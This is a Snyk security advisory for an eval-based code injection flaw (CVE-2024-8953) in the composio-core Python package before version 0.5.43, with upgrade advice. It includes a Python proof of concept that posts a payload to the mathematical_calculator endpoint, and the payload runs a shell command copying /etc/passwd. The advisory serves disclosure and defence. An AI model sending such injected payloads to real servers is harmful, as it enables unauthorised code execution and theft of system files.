Dynamic Variable Evaluation Affecting composio-core package, versions [,0.5.43)
Threat Intelligence
Exploit Maturity
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Proof of Concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-PYTHON-COMPOSIOCORE-9637814
- published3 Apr 2025
- disclosed20 Mar 2025
- creditAditya Singh
Introduced: 20 Mar 2025
NewCVE-2024-8953 (opens in a new tab)Common Vulnerabilities and Exposures (CVE) are common identifiers for publicly known security vulnerabilities
Common Weakness Enumeration (CWE) is a category system for software weaknesses
How to fix?
Upgrade composio-core to version 0.5.43 or higher.
Overview
composio-core is a Core package to act as a bridge between composio platform and other services.
Affected versions of this package are vulnerable to Dynamic Variable Evaluation through the eval function in the mathematical_calculator endpoint. An attacker can execute arbitrary code by injecting malicious input into the function.
PoC
import requests
url = "http://localhost:8000/api/actions/execute/mathematical_calculator"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Cookie": "ajs_anonymous_id=736dccdf-3165-49e6-8800-33d3a0699422",
"Content-Type": "application/json"
}
data = {
"params": {
"operation": "__import__('os').system('cat /etc/passwd > /tmp/testing.txt')"
}
}
response = requests.post(url, json=data, headers=headers)
print(f"Status Code: {response.status_code}")
print(f"Response Body: {response.text}")